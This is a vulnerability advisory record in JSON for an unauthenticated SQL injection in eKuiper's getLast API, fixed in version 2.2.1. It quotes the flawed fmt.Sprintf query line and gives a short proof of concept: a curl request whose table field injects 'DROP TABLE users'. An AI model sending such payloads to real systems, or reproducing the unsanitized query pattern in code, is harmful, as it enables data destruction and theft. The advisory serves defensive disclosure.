{"schema_version":"1.7.3","id":"GHSA-526j-mv3p-f4vv","published":"2025-07-24T14:19:17Z","modified":"2026-07-13T07:26:48.172426599Z","aliases":["CVE-2025-54379","GO-2025-3827","PYSEC-2025-241"],"related":["CVE-2025-54379"],"summary":"eKuiper API endpoints handling SQL queries with user-controlled table names. ","details":"### Summary\nA critical SQL Injection vulnerability exists in the `getLast` API functionality of the eKuiper project. This flaw allows unauthenticated remote attackers to execute arbitrary SQL statements on the underlying SQLite database by manipulating the table name input in an API request. Exploitation can lead to data theft, corruption, or deletion, and full database compromise.\n\n\n### Details\nThe root cause lies in the use of unsanitized user-controlled input when constructing SQL queries using `fmt.Sprintf`, without validating the `table` parameter. Specifically, in:\n\n```go\nquery := fmt.Sprintf(\"SELECT * FROM %s ORDER BY rowid DESC LIMIT 1\", table)\n```\nAny value passed as the `table` parameter is directly interpolated into the SQL string, enabling injection attacks. This is reachable via API interfaces that expose time-series queries.\n\n\n### PoC\n1. **Deploy eKuiper instance** (default config is sufficient).\n2. **Send a crafted request to the SQL query endpoint**:\n```bash\n   curl -X POST http://localhost:9081/sql-query \\\n     -H \"Content-Type: application/json\" \\\n     -d '{\n       \"table\": \"sensors; DROP TABLE users; --\",\n       \"operation\": \"getLast\"\n     }'\n```\n3. **Effect**: Executes two SQL queries — the first selects data, the second drops the `users` table.\n4. **Verify Result**:\n```bash\n   sqlite3 etc/kuiper/data/kuiper.db \".tables\"\n```\n\n### Impact\nCWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\n\n\n### Refferences\n- https://github.com/lf-edge/ekuiper/commit/72c4918744934deebf04e324ae66933ec089ebd3","affected":[{"package":{"name":"github.com/lf-edge/ekuiper/v2","ecosystem":"Go","purl":"pkg:golang/github.com/lf-edge/ekuiper/v2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"2.2.1"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json"}},{"package":{"name":"github.com/lf-edge/ekuiper","ecosystem":"Go","purl":"pkg:golang/github.com/lf-edge/ekuiper"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"1.14.7"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json"}}],"references":[{"type":"WEB","url":"https://github.com/lf-edge/ekuiper/security/advisories/GHSA-526j-mv3p-f4vv"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54379"},{"type":"WEB","url":"https://github.com/lf-edge/ekuiper/commit/72c4918744934deebf04e324ae66933ec089ebd3"},{"type":"PACKAGE","url":"https://github.com/lf-edge/ekuiper"}],"database_specific":{"cwe_ids":["CWE-89"],"github_reviewed":true,"github_reviewed_at":"2025-07-24T14:19:17Z","nvd_published_at":"2025-07-24T23:15:26Z","severity":"HIGH"},"severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"}]}